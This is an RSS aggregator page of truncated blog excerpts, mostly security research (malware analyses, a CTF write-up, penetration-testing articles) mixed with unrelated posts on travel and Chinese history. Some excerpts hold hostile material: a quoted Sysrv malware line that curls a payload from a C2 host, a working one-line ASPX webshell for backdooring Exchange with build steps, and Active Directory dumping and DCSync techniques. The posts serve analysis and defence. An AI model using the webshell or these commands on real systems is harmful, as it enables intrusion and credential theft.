当前节点:rss
时间节点
2021-05-13 21:06:16薇拉航线
身边所有人听说我要带猫咪一起出国时都非常震惊。说实话,我也很震惊。因为完全没想到手续竟然如此如此如此复杂 = =整个过程耗时半年左右,查了无数攻略、打了无数电话……但总算顺利带着Neo飞来德国并...
2021-05-13 14:25:43Indie Maker、认知、技术、变现
他还分享了自己的这段经历,在收到第一个报价后,并没有急于出售产品,而是冷静的分析;在遇到新冠疫情的影响下,更加的专注,逆势增长;解决用户流失问题等等
2021-05-13 00:46:07NVISO Labs
While banking trojans have been around for a very long time now, we have never seen a mobile malware family attack the applications of Belgian financial institutions. Until today… Earlier this week, the Italy-based Cleafy published an article about a new android malware family which they dubbed TeaBot. The sample we will take a look … Continue reading New mobile malware family now also targets Belgian financial apps →
2021-05-11 23:25:06NVISO Labs
While banking trojans have been around for a very long time now, we have never seen a mobile malware family attack the applications of Belgian financial institutions. Until today… Earlier this week, the Italy-based Cleafy published an article about a new android malware family which they dubbed TeaBot. The sample we will take a look … Continue reading Android overlay attacks on Belgian financial applications →
2021-05-09 22:43:34胡涂说
本文为周刊第11期,前期的周刊参见:周刊系列。

前段时间在 bilibili 上看了央视纪录片《玄奘之路》(2011年,金铁木导演)。

玄奘在大多数中国人心中的形象源于《西游记》的唐僧,那个被神通广大的孙悟空保护的斯文懦弱而又迂腐的师父。《玄奘之路》以《三藏法师传》和《大唐西域记》为素材蓝本,为还原历史上真实的玄奘。

玄奘,俗姓陈,名祎,洛州缑氏县(今河南省偃师市南境)人,师承印度那烂陀寺的戒贤大师,为汉传佛教史上最伟大的译经师之一,被誉为中国四大译经家(鸠摩罗什、真谛、玄奘、不空)之一,也是中国佛教法相唯识宗创始人。



早年求学

玄奘出生于官宦之家,幼年家庭殷实,但十岁前父母相继离世,家道衰落。由于天资聪慧,十三岁在洛阳被破格剃度。后隋朝灭亡,唐朝建立,玄奘到唐都城长安学习。后得知当时名僧多在蜀地,因而又去成都。在大慈寺受具足戒。后与商人结伴离开成都,沿江东下参学,到荆州、相州、赵州、扬州等地求学讲学。贞观元年(627年),玄奘重游长安学习外国语文和佛学。很快就穷尽各家学说,其才能倍受称赞,声誉满京师。

西行之路

玄奘感到多年来在各地所闻异说不一,因此渴望得到总赅三乘学说的《瑜伽师地论》,以求融汇贯通,于是决心前往印度求法。贞观三年(629年),玄奘毅然由长安私发,冒险前往天竺。当时立国不久的唐朝正受北面突厥的危险,长安戒严。玄奘利用一次让百姓出城觅食的机会,混在群众中离开长安。那年玄奘正29岁。

玄奘在瓜州、敦煌被守城官员认出,险些被押送回京,后遇到信佛的官员帮助逃出。后又受到商人及边关烽火台的将领帮助,玄奘终于出关。出关后面对的是茫茫大沙漠 莫贺延碛,玄奘不小心打翻水袋,玄奘在“宁可向西而死,绝不东归而生”的意志下五天没有进水,在濒临绝境中遇到水源,得以幸存。

越过沙漠,玄奘来到西域最大的国家高昌。国王信仰佛法,强求玄奘能作为国师留下来。但玄奘西行心切,绝食以明志。国王麹文泰深生愧惧,又被玄奘所折服,便于玄奘结拜为兄弟,全力支持西行求法。并约定取经回来在高昌国讲经三年。但等到玄奘回国时,高昌国由于更突厥结盟,被唐朝给灭国了,麹文泰也惊惧而死。

麹文泰给玄奘配置了四个徒弟,由官员领着一个队伍护送,并给远途各国写文书。玄奘经过焉耆国、龟兹国,来到当时控制着西域的西突厥帝国。西突厥不信佛教,但可汗并没有为难玄奘,派人护送他越过西突厥国土。玄奘带着徒弟来到了撒马尔罕,玄奘用了一个晚上的时间让原
2021-05-08 20:42:51小草窝博客
用Python生成一个PE文件,主要是为了学习PE格式,因为看很多红队工具的原理都要掌握这个,这篇文章主要是记录调试代码的过程。 主要使用的是Python3。 有关PE的文件结构描述,之前写过一个简短的对每个字段的描述 模仿cs开局一个shellcode的实现.md - 小草窝博客 (hacking8.com) 描述pe格式的主要地方是winnt.h,其中有一节叫做Image Format,该节给出了DOS MZ格式和W... 阅读全文>>
2021-05-08 13:02:41360netlab
1. 概述DDG Mining Botnet 是一个活跃已久的挖矿僵尸网络,其主要的盈利方式是挖 XMR。从 2019.11 月份至今,我们的 Botnet 跟踪系统监控到 DDG Mining Botnet 一直在频繁跟新,其版本号和对应的更新时间如下图所示:DDG Version Timeline其中,v4005~v4011 版本最主要的更新是把以前以 Hex 形式硬编码进样本的 HubList 数据,改成了 Gob 序列化的方式;v5009 及以后的版本,则摒弃了以前基于 Memberlist 来构建 P2P 网络的方式,改用自研的 P2P 协议来构建混合模式 P2P 网络
2021-05-08 12:42:49360netlab
版权版权声明: 本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。概述最近几个月受比特币、门罗币大涨的刺激,各种挖矿家族纷纷活跃起来,我们的 BotMon 系统每天都能检测到几十上百起的挖矿类 Botnet 攻击事件。根据我们统计,它们多数是已经出现过的老家族,有的只是换了新的钱包或者传播方式,z0Miner 就是其中一例。z0Miner 是去年开始活跃的一个恶意挖矿家族,业界已有公开的分析。z0Miner 最初活跃时,利用 Weblogic 未授权命令执行漏洞进行传播。近期,360 网络安全研究院 Anglerfish 蜜罐系统监测到 z0Miner 又利用 ElasticSearch 和 Jenkins 的远程命令执行漏洞进行大肆传播,近期活跃趋势如下:漏洞利用情况ElasticSearch RCE 漏洞 CVE-2015-1427虽然是个
2021-05-06 21:41:25360netlab
On Apr 28, we published our RotaJakiro backdoor blog, at that time, we didn’t have the answer for a very important question, what is this backdoor exactly for? We asked the community for clues and two days ago we got a hint, PE(Thanks!) wrote the following comment on
2021-05-06 21:41:25360netlab
我们的双头龙blog发布后引起了较大反响,除了媒体转载,一些安全同行还纷纷在我们blog下面留言和提问,其中5月4号的一则留言提到双头龙跟海莲花(OceanLotus)样本的C2行为有联系:

留言所提到的样本为一个zip打包文件,2016年就已出现。该zip可以解压出多个文件,那个名为Noi dung chi tiet(对应中文详细信息)的Mach-O格式可执行文件即是海莲花样本。对比分析显示该样本确实与双头龙样本存在多个相似之处,所以它们或许可以解开双头龙的身世之谜:它极可能是海莲花的Linux版本。本文主要从2进制代码层面介绍这些相似点。
相似点1:C2会话建立函数
Linux常见的域名解析函数为gethostbyname(),但双头龙使用了相对小众的getaddrinfo()函数,C2域名的解析和会话建立都在一个函数中完成,而海莲花样本中也存在一个模式类似的相同功能的函数,2者的函数对比如下:

能看出来它们不但功能相同,对sprintf()和getaddrinfo()的使用方式也几乎一模一样。此外,双头龙和海莲花都使用了单独的数据结构来保存C2会话信息,比如socket fd, 是否active, timeout等,而且它们的数据结构也很相似。

这些相似性是是2者存在关联的第一个证据。
相似点2:上线包构造手法
双头龙和海莲花的网络数据包都是由Head,Key,
2021-05-06 00:21:31小草窝博客
nmap真是一款神器,并且开源了这么多年依旧在更新。 六天前依然在更新。 每次做扫描时调用nmap虽然没什么大碍,但也总想着能自己实现一款可控的端口指纹识别工具。 nmap指纹解析n... 阅读全文>>
2021-05-05 12:13:54tyler_download的专栏
近来工作上接收到一项任务,实现c++后台服务器程序,要求它能承载千万级别的DAU读写请求。目前实现千万级高并发海量数据请求的服务器设计在”套路“上比较成熟,基本做法是形成服务器集群,然后将海量请求分发到集群中的各个服务器,使得服务器面对的请求数量不再“海量”,本质上就是采用分而治之,各个击破的思维来破解高并发的数据请求。
后台服务器实现的难点之一在于,当服务器程序运行在不同机器上时,服务器之间的数据通信则成为技术难点。假设客户端要上传一张图片,它会将图片数据发送给API服务器程序,后者从数据库服务器集群中选                    
                        作者:tyler_download 发表于 2021/05/05 11:41:59 原文链接 https://blog.csdn.net/tyler_download/article/details/116405174                    
                    
                        阅读:3478 评论:4 查看评论
2021-05-04 20:33:24PHITHON BLOG
2021-05-04 20:13:25小草窝博客
在之前为了控制 Hacking8信息流[https://i.hacking8.com/] 的注册人数,开启了邀请码机制,并设计了一套闯关题目,发现很多人对闯关题目非常感兴趣,所以假期又设计了一套新的闯关题目。 一共有五关,通关前四关会得到hacking8的邀请码,通关第五关可以加我微信,拉你到hacking8交流群~ 题目很简单并且好玩,下面是一些闯关的截图~ 娱乐可以玩玩《合成大黑客》 阅读全文>>
2021-05-04 04:12:51Swing'Blog
DEFCON 29 CTF Qualifier:  coooinbase && coooinbase-kernel Write-upcoooinbase题目描述:a simple service backed by special hardware for buying bitcoin: our beta testing server is live at http://52.6.166.222:4567 - this time attack the kernel!图:1 题目服务首页从题目的首页的 custom hardware 处可以下到题目的固件包。图: 2 下载题目固件可以看到固件包里包以下文件:1234567➜  coooinbase tar -xvzf srcx dist/x dist/x.rbx dist/coooinbase.binx dist/rootfs.imgx dist/x.shx dist/x.html其中 x.rb 是 web 的后端服务,我们需要关注的代码逻辑如图:图3: x.rb 代码阅读代码,我们可以知道一下几点:当我们访问 /buy api 的时候, 代码会请求 HTTP_POST 地址处的的 /gen-bson api, 当获取到 /gen-bson api 返回的数据后,会将数据写入 pwn 文件中,然后以重定向的形式喂入 ./x.sh 文件/gen-bson 这个 api 会调用 valid_credit_card 和 valid_association 函数分别校验填入的 cardnumber 的合法性。 但是值得注意的是,这两个函数均会调用 to_s.gusb(/\D/, '') 将传入的 number 变量中的非数字给去掉,但是在 44 -处的 number 却是仍然带有字符串的,因此此处我们可以传入其他非数字的值 (6011000000000004 这个cardnmumber 可以过校验)gen-bson 在45-46 行处会将参数转成 bson 格式,且 base64 编码, 然后返回(注: 此处还有有个点,我在一开始的时候没注意到,暂且不提)x.sh 的代码内容如下:1timeout 1 qemu-system-aarch64 -machine virt -cpu co
2021-05-02 18:12:05胡涂说
本文为周刊第十期,前期的周刊参见:周刊系列。

前段时间在 bilibili 上看了央视纪录片《敦煌》(2010年,周兵导演)。对敦煌的绚丽的艺术与厚重的历史赞叹不已,有机会一定要去敦煌看一看。

莫高窟

敦煌古名瓜州,后又名沙洲。汉武帝拓展疆域拿下河西地区,设置敦煌郡,意“敦,大也,煌,盛也”。从此成为丝绸之路上的重镇。境内有两个著名的关隘:玉门关和阳关。唐人诗云:“春风不度玉门关”、“西出阳关无故人”。敦煌最为有名的当属莫高窟,又称“千佛洞”。

(东晋)前秦的乐尊和尚在山上开凿了第一个洞窟,称为“漠高窟”,意为“沙漠的高处”。后世因“漠”与“莫”通用,便改称为“莫高窟”。莫高窟历经十六国、北朝、隋唐、五代和宋、西夏、回鹘和元,经过不断增凿营建,渐成千余洞窟。莫高窟现存石窟735个,分为南北两区。南区的石窟是坐禅、修行、礼拜的场所,北区的石窟主要是僧人们居住和死亡后掩埋的场所。里面有大量的壁画、泥塑、佛像等,不仅规模宏大,而且融合了西域、中原多种民族的艺术风格,被誉为“墙壁上的博物馆”,并被列为世界文化遗产。

藏经洞

光绪二十六年(1900年)莫高窟的道士王圆箓偶然间发现了一个藏着几万经卷、文书的废弃洞窟,但当时的清政府正处于内忧外患中,对王道士的上报置之不理。1907年,英国考古学家斯坦因闻讯赶到敦煌,他为了骗取王圆箓的信任,声称是玄奘的信徒。两次来到敦煌分别以200两和500两银两购得大量敦煌文献。这些藏品大都捐赠给了大英博物馆和大英图书馆,大英博物馆现拥有与敦煌相关的藏品约1.37万件,是世界上收藏敦煌文物最多的地方。

紧接着,法国考古学家伯希和也来到敦煌,他精通汉学,发现斯坦因并没有做细致挑选。伯希和在洞中拣选了三星期,最终以600两银两为代价,获取了1万多件堪称菁华的敦煌文书,大都入藏法国国家图书馆。

伯希和在北京向学者们展示了一些敦煌珍本,引起学界注意,这才促使清政府命人清点文书押送进京。但押运过程十分草率,甚至没有装箱,路上遗失了一些,还有些被官员私藏甚至毁坏,当初发现的五万多件藏经洞文献,最终只有八千件藏入京师图书馆,现均存于中国国家图书馆。

散落于民间的敦煌文献有一部分被日本藏家购得。后来,俄国考古学家奥尔登堡对已经搬空的藏经洞进行了挖掘,又获得了一万多件文物碎片,目前藏于俄罗斯科学院东方学研究所。

因此,有人总结说:藏经洞的文物,藏于英国者最多,藏于法国者最精,藏于俄国者最杂
2021-05-01 17:51:38一个安全研究员
前几天不是发了篇文章吗:看了道哥的公众号,我不再焦虑了
本以为就是很平淡的一篇文章,但是没想到数据居然还挺好看,也是自年后以来我写的数据最好的一篇稿子了
上一篇这么猛的稿子还是去年我初入职场写的一篇类似总结一样的东西吧,一篇文章直接吸引了小200人关注,大家可能觉得才200人,也不多嘛
那还是得看用什么标准来评价了
这么和大家说吧,就是现在如果我去找一个四五万粉的号给我推广一下,可能也就才能增涨200多人
所以单单是通过一篇朴实无华的文章就吸引200人关注我觉得已经是我运营这个号的高光时刻了
要是说那篇给我                    
                        作者:he_and 发表于 2021/05/01 17:35:35 原文链接 https://blog.csdn.net/he_and/article/details/116331765                    
                    
                        阅读:62 评论:2 查看评论
2021-04-30 11:11:04NVISO Labs
This blogpost will be a bit different, as it’s going to tell a bit of a story… In this blogpost I want to achieve 2 objectives: address a question I keep hearing and seeing pop up in my DM every now and then, “how do I become a red teamer/ how do I become a … Continue reading I Solemnly Swear I Am Up To No Good. Introducing the Marauders Map →
2021-04-30 11:11:04NVISO Labs
This blog post will cover the Cobalt Strike DLL stager's anatomy, design choices and highlight ways to reduce both log footprint and time-to-shellcode.
2021-04-30 11:11:04NVISO Labs
This blogpost explains all the steps I took while analyzing the Cabassous/FluBot malware. I wrote this while analyzing the sample and I’ve written down both successful and failed attempts at moving forward, as well as my thoughts/options along the way. As a result, this blogpost is not a writeup of the Cabassous/FluBot malware, but rather … Continue reading How to analyze mobile malware: a Cabassous/FluBot Case study →
2021-04-30 11:11:04NVISO Labs
Many applications require the user to authenticate inside the application before they can access any content. Depending on the sensitivity of the information contained within, applications usually have two approaches: The user authenticates once, then stays authenticated until they manually log out; The user does not stay logged in for too long and has to … Continue reading A closer look at the security of React Native biometric libraries →
2021-04-30 11:11:04NVISO Labs
This blog post is the last part of a series, if you are interested in the security or privacy of smart home devices, be sure to check out the other parts as well! TL;DR: In our previous blog posts we concluded that there is quite a long way to go for both security and privacy … Continue reading Smart Home Devices: assets or liabilities? – Part 3: Looking at the future →
2021-04-30 11:11:04NVISO Labs
Ever needed a notifier when a new beacon checks in? Don’t want to keep checking your Cobalt-Strike server every 5 minutes in the hopes of a new callback? We got you covered! Introducing the notification-service aggressor script available athttps://github.com/NVISOsecurity/blogposts/tree/master/cobalt-strike-notifier If the above image resonates with you, you’ll know that the point between sending out your … Continue reading Tap tap… is this thing on? Creating a notification-service for Cobalt-Strike →
2021-04-30 11:11:04NVISO Labs
For many years, industrial automation and control systems (IACS) relied on the fact that they were usually isolated in physically secured areas, running on proprietary hardware and software. When open technologies, standard operating systems and protocols started pushing their way into IACS replacing proprietary solutions, the former “security through obscurity” approach did no longer work. … Continue reading Securing IACS based on ISA/IEC 62443 – Part 1: The Big Picture →
2021-04-30 11:11:04NVISO Labs
Cyber security has long since become a strategic priority for organizations across the globe and in all sectors. Therefore, training and hiring young potential in information security has become a crucial goal.   To raise awareness of cyber security threats and help train a generation of security aware security experts, we at NVISO organize Capture the Flag (CTF) Cyber Security Events in two countries, Belgium and Germany and reach a broad audience.   Each … Continue reading Cyber Security Contests – A look behind the scenes about how to expand the community →
2021-04-30 11:11:04NVISO Labs
TL;DR – Part two of this trilogy of blog posts will tackle the next big topic when it comes to smart home devices: privacy. Are these devices doubling as the ultimate data collection tool, and are we unwittingly providing the manufacturers with all of our private data? Find out in this blog post! This blog … Continue reading Smart Home Devices: assets or liabilities? – Part 2: Privacy →
2021-04-30 11:11:04NVISO Labs
This blogpost showcases several methods of dynamic invocation that can be leveraged to bypass inline and IAT hooks.
2021-04-30 01:10:22MSRC Blog
Microsoft’s Section 52, the Azure Defender for IoT security research group, recently uncovered a series of critical memory allocation vulnerabilities in IoT and OT devices that adversaries could exploit to bypass security controls in order to execute malicious code or cause a system crash. These remote code execution (RCE) vulnerabilities cover more than 25 CVEs …  “BadAlloc” – Memory allocation vulnerabilities could affect wide range of IoT and OT devices in industrial, medical, and enterprise networks Read More »
2021-04-29 18:10:26360netlab
Overview
From the end of last year to now, we have see the uptick of the mining botnet families. While new families have been popping up, some old ones are get frequently updated. Our BotMon system has recently reported about the [rinfo][z0miner]. And the latest case comes from Sysrv-hello
2021-04-28 21:50:31360netlab
版权
版权声明: 本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。
概述
从去年末到现在,挖矿类型的botnet家族一直活跃,除了新家族不断出现,一些老家族也频繁升级,主要是为了提高传播能力和隐蔽性,我们的 BotMon 系统对此多有检测[rinfo][z0miner]。最新的案例来自Sysrv-hello,本来近期已经有2家安全公司先后分析过该家族的新变种[1][2],但文章刚出来sysrv的作者就在4月20号再次进行升级,增加了感染网页的能力,本文对此做一分析。
新模块a.py和BrowserUpdate.exe
我们知道sysrv能同时感染Linux和Windows系统,其入口为一个脚本文件,Linux下为bash脚本,最常见的文件名是ldr.sh,Windows下为PowerShell脚本ldr.ps1,这次升级只在ldr.sh中检测到,bash脚本中添加了如下代码:
curl $cc/BrowserUpdate.exe > /tmp/BrowserUpdate.
2021-04-28 21:29:58360netlab
Overview
On March 25, 2021,  360 NETLAB's BotMon system flagged a suspiciousELF file (MD5=64f6cfe44ba08b0babdd3904233c4857) with 0 VT detection, the sample communicates with 4 domains on TCP 443 (HTTPS), but the traffic is not of TLS/SSL. A close look at the sample revealed it to be a backdoor targeting
2021-04-28 21:29:58360netlab
版权
版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。
概述
2021年3月25日,360 NETLAB的BotMon系统发现一个的VT 0检测的可疑ELF文件(MD5=64f6cfe44ba08b0babdd3904233c4857),它会与4个业务类型截然不同的域名进行通信,端口均为TCP 443(HTTPS),但流量却并非TLS/SSL类型,这个异常行为引起了我们的兴趣,进一步分析发现它是一个针对Linux X64系统的后门木马,该家族至少已经存在3年但目前还是0检测。基于该家族使用rotate加密,并且运行后对root/non-root账户有不同的行为,犹如一只双头龙,一体双向,我们将它命名为RotaJakiro。
RotaJakiro隐蔽性较强,对加密算法使用比较多,包括:使用AES算法加密样本内的资源信息;C2通信综合使用了AES,XOR,ROTATE加密和ZLIB压缩算法。指令方面,RotaJakiro支持12种指令码,其中3种是和特定plugin相关的,遗憾的是目前我们并没有捕获到这类payload,因此并不知道它的真正目的。从广义的后门角度来看,RotaJakiro支持的功能可以归纳成以下4类:
2021-04-27 16:29:12三好学生
0x00 前言


在之前的文章《对APT34泄露工具的分析-HighShell和HyperShell》分析了HyperShell中的ExpiredPassword.aspx,通过向Exchange登录页面下的ExpiredPassword.aspx添加代码实现后门功能。

本文将要沿着这个思路,在技术角度介绍另外两种实现方法,开源测试代码,给出防御建议。

0x01 简介


本文将要介绍以下内容:


  两种后门代码的实现
  通过C Sharp代码实现后门连接
  通过Python代码实现后门连接
  利用分析
  防御建议


0x02 两种后门代码的实现


1.内存加载.net程序集

这里参考《利用动态二进制加密实现新型一句话木马之.NET篇》

为了缩短代码长度,示例test1.aspx的代码如下:

<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>


代码会判断是否带有POST请求的参数demodata,如果存在会将POST请求中参数demodata的内容作base64解密,在内存加载并调用名为Payload的实例

注:

sharpyshell也使用相同的内存加载方式

我们可以通过以下方式生成Payload:

(1)新建文件demo.cs

代码如下:

using System;
using System.Diagnostics;
public class Payload
{
    public override bool Equals(Object obj)
    {
        Process.Start("calc.exe");
        return true;
    }
}


(2)编译生成dll文件

命令如下:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library demo.cs


生成demo.dll后进行base64加密,作为POST请求中参数demodata的内容,发送至test1
2021-04-27 16:29:12三好学生
0x00 前言


在某些环境下,访问Web服务器的资源需要通过NTLM Over HTTP协议进行NTLM认证,而我们在这样的Web服务器使用Webshell时,不仅需要考虑NTLM认证的实现,还需要满足能够在命令行下使用。

本文仅在技术研究的角度介绍一种实现方法,开源代码,分享脚本开发细节。

0x01 简介


本文将要介绍以下内容:


  设计思路
  脚本开发细节
  开源代码


0x02 设计思路


通过NTLM Over HTTP协议进行NTLM认证的Web服务器有很多,这里分别以Exchange和SharePoint为例

(1)Exchange测试环境

文件保存的绝对路径:

C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\Autodiscover\test.aspx


对应的URL为:

https://URL/Autodiscover/test.aspx


(2)SharePoint测试环境

文件保存的绝对路径:

C:\Program Files\Common Files\microsoft shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\test.aspx


对应的URL为:

http://URL/_layouts/15/test.aspx


访问test.aspx时均需要通过NTLM Over HTTP协议进行NTLM认证

这里以一个支持cmd命令的webshell为例进行测试,webshell的地址为:

https://github.com/tennc/webshell/blob/master/aspx/asp.net-backdoors/cmdexec.aspx

如下图



这个webshell需要通过浏览器进行操作,首先完成NTLM认证,接着填入正确的Auth Key和要执行的cmd命令

我们的目标是满足能够在命令行下使用,可以以此为模板进行修改,设计思路如下:

(1)execCmd.aspx

接收Form表单请求作为参数,对Auth Key进行验证

如果验证失败,返回空结果

如果验证成功,执行传入的cmd命令并返回执行结果

(2)aspxCmdNTLM.py

命令行脚本

首先通过NTLM Over HTTP协议完
2021-04-27 16:29:12三好学生
0x00 前言


在渗透测试中,当我们获得了用户的邮箱凭据,需要对邮箱内容进行分析时,可以选择通过IMAP协议实现自动化来提高效率。

本文以Exchange为例,介绍通过IMAP协议下载邮件和附件的方法,开源代码,分享脚本编写细节。

0x01 简介


本文将要介绍以下内容:


  基础知识
  Exchange开启IMAP功能和登录日志
  Python3实现细节
  开源代码


0x02 基础知识


1.IMAP

全称是Internet Mail Access Protocol,即交互式邮件存取协议

是一种邮件获取协议,可以从邮件服务器上获取邮件的信息

使用端口143

2.IMAP4_SSL

全称是IMAP over SSL,是IMAP协议基于SSL安全协议之上的一种变种协议

继承了SSL安全协议的非对称加密的高度安全可靠性,可防止邮件泄露,也是用来接收邮件的

使用端口993

3.Python3 imaplib库

官方文档:

https://docs.python.org/3/library/imaplib.html

该模块定义了三个类,IMAP4,IMAP4_SSL和 IMAP4_stream

为了提高安全性,我们通常使用用于安全连接的子类IMAP4_SSL

4.Python3 email库

官方文档:

https://docs.python.org/3/library/email.html

当我们使用imaplib库读取邮件时,需要使用email库将接收的消息转换为EmailMessage对象,可以更加方便的对邮件内容进行处理

0x03 Exchange开启IMAP功能和登录日志


默认情况下,Exchange中未启用IMAP4客户端连接

参考资料:

https://docs.microsoft.com/en-us/exchange/clients/pop3-and-imap4/configure-imap4?view=exchserver-2019

开启方法如下:

1.启动IMAP4服务,并将服务配置为自动启动

Powershell命令如下:

Start-Service MSExchangeIMAP4; Start-Service MSExchangeIMAP4BE
Set-Service MSExchangeIMAP4 -StartupTyp
2021-04-27 16:29:12三好学生
0x00 前言


在之前的文章《渗透基础——活动目录信息的获取》以获取活动目录中所有用户、所有计算机和所有组为例,介绍常用的信息获取方法。

但是在实际使用过程中,一些工具会被杀毒软件拦截。

所以本文将要对获取方法进行补充,同时绕过杀毒软件的拦截。

0x01 简介


本文将要介绍以下内容:


  使用csvde获取活动目录信息
  使用ldifde获取活动目录信息
  使用AdFind获取活动目录信息
  使用C#开发的轻量级获取工具


0x02 使用csvde获取活动目录信息


说明文档:

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)

使用csvde导出的文件格式为csv,可以使用Microsoft Excel查看

默认只能在以下系统使用,例如:


  Windows Server 2003
  Windows Server 2008
  Windows Server 2003 R2
  Windows Server 2008 R2
  Windows Server 2012,
  Windows Server 2003 with SP1
  Windows 8
  …


1.导出当前域内活动目录信息示例

导出当前域内所有信息:

csvde -f all.csv


导出当前域内所有用户信息:

csvde -f user.csv -r "(&(objectCategory=person))"


导出当前域内所有机器信息:

csvde -f machine.csv -r "(&(objectCategory=computer))"


导出当前域内所有组信息:

csvde -f group.csv -r "(&(objectCategory=group))"


导出当前域内所有管理员组的用户信息:

csvde -f admin.csv -r "(&(objectCategory=group)(name=Domain Admins))"


导出当前域内所有OU信息:

csvde -f ou.csv -r "(&(objectCategory=orga
2021-04-27 16:29:11三好学生
0x00 前言


在之前的文章《域渗透——DCSync》提到过DCSync的利用条件:

获得以下任一用户的权限:


  Administrators组内的用户
  Domain Admins组内的用户
  Enterprise Admins组内的用户
  域控制器的计算机帐户


本文将要补全上篇文章中未提到的最后一种利用方法,介绍如何通过域控制器的计算机帐户口令hash实现DCSync

0x01 简介


本文将要介绍以下内容:


  MachineAccount简介
  获得MachineAccount口令hash的方法
  使用MachineAccount实现DCSync
  防御检测


0x02 MachineAccount简介


MachineAccount是每台计算机在安装系统后默认生成的计算机帐户

计算机帐户的密码存储在注册表的位置:HKLM\SECURITY\Policy\Secrets\$machine.ACC

如果计算机加入域中,会将计算机帐户的密码同步到域控制器并保存在域控制器的NTDS.dit文件中

计算机帐户的密码默认每30天自动更新,密码长度为120个字符,所以说,即使获得了计算机帐户密码的hash,也很难还原出计算机帐户的明文口令

关闭当前计算机帐户密码自动更新的两种方法(适用于工作组):

1.修改组策略

组策略位置:

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\


如下图



默认未启用,如果设置为启用后,将会停止更新密码

参考资料:

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc785826(v=ws.10)

2.直接修改注册表

注册表位置:HKLM\System\CurrentControlSet\Services\Netlogon\Parameters\

将DisablePasswordChange的值设为1

关闭域内计算机帐户密码自动更新的两种方法(适用于域网络):

1.修改组策略

这里需要修改域组策略,在域控制器上打开Group Policy Management
2021-04-27 16:29:11三好学生
0x00 前言


AsyncRAT是一款使用C Sharp开发的C2工具,本文仅在技术研究的角度分析AsyncRAT的技术细节,介绍检测方法。

注:

本文选择的AsyncRAT更新日期为2020年5月9日

0x01 简介



  AsyncRAT的优点
  AsyncRAT的技术细节
  检测方法


0x02 AsyncRAT的优点


AsyncRAT使用C Sharp开发,应用于Windows系统,具有以下优点:


  支持从Pastebin.com读取C2服务器的配置信息
  支持内存加载PE文件
  支持动态编译并执行C#或者VB代码
  支持U盘感染,能够感染U盘中所有使用.NET开发的exe文件
  支持自动读取Firefox和Chrome浏览器中保存的密码
  通过欺骗用户点击的方式绕过UAC进行提权
  通过C#接口技术,提高程序的扩展性,在程序实现上将每一个功能对应一个类,编译成dll文件,在需要加载的时候,由Server发送至Client,Client通过Activator.CreateInstance将类实例化,进而调用类的方法。


0x03 AsyncRAT的技术细节


本节按照AsyncRAT控制面板上的功能逐个进行分析,如下图



1.SendFile

(1)ToMemory

内存加载exe文件,支持以下两种类型:


  Reflection


使用Assembly.Load加载C#程序

更多细节可参考之前的文章《从内存加载.NET程序集(Assembly.Load)的利用分析》


  RunPE


通过替换进程内存的方式加载exe文件

可选择以下程序作为被注入的程序:


  aspnet_compiler.exe
  RegAsm.exe
  MSBuild.exe
  RegSvcs.exe
  vbc.exe


注:

以上5个exe文件位于Microsoft.NET Framework的安装目录,同AsyncClient.exe的位数保持一致

使用32位的AsyncClient.exe反弹回的Session,默认会寻找32位Microsoft.NET Framework的安装目录,例如:C:\Windows\Microsoft.NET\Framework\v4.0.30319

使用64位的AsyncClient.exe反弹回的Sess
2021-04-27 16:29:11三好学生
0x00 前言


Seatbelt是一个C#项目,可以用来对主机进行安全检查,在进攻和防御的角度都能发挥作用。

通过一条命令,就能够获得当前主机的多项配置信息,方便实用。

为了能够扩展Seatbelt的使用场景,在不修改Seatbelt任何代码的前提下,本文将要介绍两种通过内存加载Seatbelt的方法(Assembly.Load和execute-assembly),分别补全向.NET程序集的Main函数传入参数的实现代码。

之前的文章《从内存加载.NET程序集(Assembly.Load)的利用分析》和《从内存加载.NET程序集(execute-assembly)的利用分析》
只介绍了向指定类的方法传入参数的实现代码

0x01 简介


本文将要将介绍以下内容:


  Seatbelt的编译和使用
  使用Assembly.Load加载Seatbelt并传入参数的方法
  使用execute-assembly加载Seatbelt并传入参数的方法
  Visual Studio2015在64位平台下使用汇编代码的方法


0x02 Seatbelt的编译和使用


1.编译

工程地址:

https://github.com/GhostPack/Seatbelt

支持.NET 3.5和4.0

需要使用Visual Studio2017或者更高的版本进行编译

2.使用

需要传入参数指定具体的命令,例如运行所有检查并返回所有输出:

Seatbelt.exe -group=all -full


详细的命令可参考项目的说明:

https://github.com/GhostPack/Seatbelt#command-line-usage

0x03 使用Assembly.Load加载Seatbelt并传入参数的方法


实现语言:C#

实现思路:

将Seatbelt.exe作base64编码后保存到数组中,再使用Assembly.Load()作base解码后进行加载,最后向Main函数传入参数

实现代码:

1.将Seatbelt.exe作base64编码并返回结果

c#实现代码:

using System;
using System.Reflection;
namespace TestApplication
{
    public class Program
    {
    
2021-04-27 16:29:11三好学生
0x00 前言


在渗透测试中,为了获得Windows系统中的用户口令,通常会选择读取lsass进程的内存。这种方法不仅需要获得系统的管理员权限,而且在更多情况下需要绕过系统对lsass进程的保护。

我在之前的文章《Windows下的密码hash——Net-NTLMv1介绍》曾介绍过使用InternalMonologue获得当前用户凭据的方法(通过SSPI调用对NTLM身份验证包(MSV1_0)的本地过程调用,以计算出NetNTLM响应),不需要对lsass进程操作。

本文将要介绍另外一种获得当前用户口令的方法,同样不需要对lsass进程操作。

这是Benjamin @gentilkiwi Delpy开源的kekeo在2018年添加的功能,只需要修改Windows系统的组策略,就能够以普通用户的权限获得用户的明文口令。

本文将要对其中的原理进行简要介绍,分析不同环境下的利用思路,给出防御建议。

0x01 简介


本文将要介绍以下内容:


  实现原理
  实现方法
  利用分析
  防御检测


0x02 实现原理


1.基础知识

CredSSP

全称Credential Security Support Provider protocol

CredSSP协议的目的是将用户的明文密码从CredSSP客户端委派给CredSSP服务器

